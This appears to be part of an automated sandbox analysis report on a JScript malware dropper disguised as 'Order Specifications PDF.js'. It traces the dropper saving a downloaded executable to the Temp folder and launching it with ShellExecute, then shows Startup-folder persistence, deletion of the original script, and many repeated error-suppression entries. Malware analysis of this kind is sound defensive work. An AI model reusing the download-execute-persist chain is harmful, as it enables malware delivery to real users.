            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: CreateObject%22");ITextStream.WriteLine(" entry:1716 f:_0x56566c a0:237");ITextStream.WriteLine(" exit:1716 f:_0x56566c r:%22BQ9o%22");ITextStream.WriteLine(" entry:1712 f:_0x155c25 a0:127 a1:%22BQ9o%22");ITextStream.WriteLine(" exit:1712 f:_0x155c25 r:%22ADODB.Stream%22");IHost.Name();ITextStream.WriteLine(" entry:1703 o:Windows%20Script%20Host f:CreateObject a0:%22ADODB.Stream%22");IHost.CreateObject("ADODB.Stream");IHost.Name();_Stream._00000000();ITextStream.WriteLine(" exit:1703 o:Windows%20Script%20Host f:CreateObject r:");ITextStream.WriteLine(" entry:1813 f:_0x445216 a0:205 a1:%22%5Epwq%22");ITextStream.WriteLine(" exit:1813 f:_0x445216 r:%22Open%22");_Stream._00000000();ITextStream.WriteLine(" entry:1809 o: f:Open");_Stream.Open();_Stream._00000000();ITextStream.WriteLine(" exit:1809 o: f:Open r:undefined");ITextStream.WriteLine(" entry:1823 f:_0x115fc7 a0:136");ITextStream.WriteLine(" exit:1823 f:_0x115fc7 r:%22Type%22");_Stream.Type("1");ITextStream.WriteLine(" entry:1832 f:_0x445216 a0:241 a1:%22h2t%24%22");ITextStream.WriteLine(" exit:1832 f:_0x445216 r:%22Write%22");IServerXMLHTTPRequest2.responseBody();_Stream._00000000();ITextStream.WriteLine(" entry:1828 o: f:Write a0:");_Stream.Write("Unsupported parameter type 00002011");_Stream._00000000();ITextStream.WriteLine(" exit:1828 o: f:Write r:undefined");ITextStream.WriteLine(" entry:1846 f:_0x115fc7 a0:144");ITextStream.WriteLine(" exit:1846 f:_0x115fc7 r:%22Position%22");_Stream.Position("0");ITextStream.WriteLine(" entry:1855 f:_0x115fc7 a0:124");ITextStream.WriteLine(" exit:1855 f:_0x115fc7 r:%22SaveToFile%22");_Stream._00000000();ITextStream.WriteLine(" entry:1851 o: f:SaveToFile a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5CVNZVNCXKKJSF.exe%22 a1:2");_Stream.SaveToFile("C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe", "2");_Stream._00000000();ITextStream.WriteLine(" exit:1851 o: f:SaveToFile r:undefined");ITextStream.WriteLine(" entry:1866 f:_0x445216 a0:232 a1:%22zn0Y%22");ITextStream.WriteLine(" exit:1866 f:_0x445216 r:%22Close%22");_Stream._00000000();ITextStream.WriteLine(" entry:1862 o: f:Close");_Stream.Close();_Stream._00000000();ITextStream.WriteLine(" exit:1862 o: f:Close r:undefined");ITextStream.WriteLine(" entry:1878 f:_0x115fc7 a0:110");ITextStream.WriteLine(" exit:1878 f:_0x115fc7 r:%22Shell.Application%22");ITextStream.WriteLine(" entry:1883 f:_0x56566c a0:269");ITextStream.WriteLine(" exit:1883 f:_0x56566c r:%22ShellExecute%22");ITextStream.WriteLine(" entry:1891 f:_0x155c25 a0:125 a1:%22vUkl%22");ITextStream.WriteLine(" exit:1891 f:_0x155c25 r:%22open%22");IShellDispatch6._00000000();ITextStream.WriteLine(" entry:1872 o: f:ShellExecute a0:%22C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5CVNZVNCXKKJSF.exe%22 a1:%22%22 a2:%22%22 a3:%22open%22 a4:%221%22");IShellDispatch6.ShellExecute("C:\Users\user\AppData\Local\Temp\VN", "", "", "open", "1")
            Source: Order Specifications PDF.jsInitial file: High amount of function use 12
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF56AF push esp; iretd 11_2_02CF56B2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF56AB push esp; iretd 11_2_02CF56AE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF56A9 push esp; iretd 11_2_02CF56AA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF56BF push ebp; iretd 11_2_02CF56C2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF56BB push ebp; iretd 11_2_02CF56BE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF56B7 push ebp; iretd 11_2_02CF56BA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF56B3 push esp; iretd 11_2_02CF56B6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF04C3 push eax; ret 11_2_02CF04C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CFBACF push eax; retf 11_2_02CFBAD9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF0E58 pushad ; retf 11_2_02CF0E59
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02CF0FC3 push eax; mov dword ptr [esp], edx11_2_02CF0FCC
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1B250 push FFFFFF8Bh; iretd 11_2_02D1B25D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D1B262 pushfd ; iretd 11_2_02D1B263
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D140A0 push 00000005h; ret 11_2_02D140B5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02D13DAF push 00000005h; ret 11_2_02D13DC5
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_02DB5367 push FFFFFF8Bh; iretd 11_2_02DB5374
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_02EFF8CD push FFFFFF9Fh; retn 004Dh13_2_02EFF8D6
            Source: initial sampleStatic PE information: section name: .text entropy: 7.96732682517633
            Source: initial sampleStatic PE information: section name: .text entropy: 7.96732682517633
            Source: initial sampleStatic PE information: section name: .text entropy: 7.96732682517633
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\order specifications pdf.jsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
